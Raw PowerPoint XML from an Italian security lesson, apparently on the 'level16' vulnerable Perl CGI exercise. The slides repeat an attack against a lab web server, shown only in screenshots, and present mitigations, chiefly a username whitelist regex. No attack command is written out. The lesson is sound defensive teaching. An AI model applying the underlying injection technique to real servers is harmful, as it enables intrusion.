              <a:t> -C /home/level16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9195D3FE-92F6-C499-80E2-EF65C35DE6DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1489794" y="3594082"/>
            <a:ext cx="6154009" cy="562053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="496850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fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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MITIGAZIONE #1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="276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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Ripetiamo l’attacco sul server Web appena avviato, loggandoci come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>level16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CBC80D5-2D16-42EA-B505-B2C5B28CE32E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186653" y="1836136"/>
            <a:ext cx="6763694" cy="1952898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rettangolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CB0949C-3E6D-9443-0B8D-8BE380C0B97F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186653" y="3050275"/>
            <a:ext cx="5384744" cy="1842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031177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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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MITIGAZIONE #2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="308776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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Possiamo implementare nello script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1"/>
              <a:t>Perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> un filtro dell’input basato su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>blacklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>. Se l’input non ha la forma di un utente tipo viene scartato.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Sappiamo che lo script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" i="1" err="1"/>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>esegue le seguenti operazioni:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Memorizza il parametro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> in una variabile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>$username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Fa il match di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>$username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>con una espressione regolare che è stata appositamente creata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Controlla se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>$username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>verifica l’espressione regolare:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Se SI, continua l’esecuzione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Se NO, termina lo script.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88658171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fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="37"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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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MITIGAZIONE #2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="19618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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>L’espressione regolare creata per il match degli username è la seguente:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>^[a-zA-Z0-9_]{4,15}$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>inizio riga</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[a-zA-Z0-9_] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>caratteri ammessi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{4, 15} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>numero di caratteri consentiti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>fine riga</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2488735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fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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MITIGAZIONE #2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{725C804E-167C-FC52-5214-A002913B3C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137320" y="1119494"/>
            <a:ext cx="6858957" cy="3810532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rettangolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB68F311-7B30-4AED-3AF0-2FB6EDC04E81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760561" y="3357349"/>
            <a:ext cx="4169391" cy="7301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763300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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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MITIGAZIONE #2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252220"/>
            <a:ext cx="7313596" cy="276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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Ripetiamo l’attacco sul server Web, quello avviato su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>level16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D6456D5-78FC-9354-25F3-61605BA87E97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="46489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142083" y="3039535"/>
            <a:ext cx="6849431" cy="1157155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rettangolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBA36861-FC83-896F-5383-EC38CB10E216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128436" y="3657604"/>
            <a:ext cx="1676180" cy="1705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descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC393DCB-CC5B-7603-F8C9-B6330915A4F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="56463"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1156372" y="1612837"/>
            <a:ext cx="6820852" cy="1157155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rettangolo 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E39FBC4C-2BAE-A415-87DD-EA2694CBCF00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1148907" y="2253340"/>
            <a:ext cx="1676180" cy="1705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ttangolo 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C430AD65-70D2-4C8E-1F6C-793B1A034E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3211994" y="1777621"/>
            <a:ext cx="2035570" cy="170598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6">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Rettangolo 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01FAFE2F-CBB1-97FC-4BD7-83AB9A26560F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3211994" y="3194519"/>
            <a:ext cx="2410884" cy="170598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6">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176444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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>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3" grpId="0" animBg="1"/>
      <p:bldP spid="1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Google Shape;1840;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260120" y="845540"/>
            <a:ext cx="1284600" cy="12846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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234334" y="2352675"/>
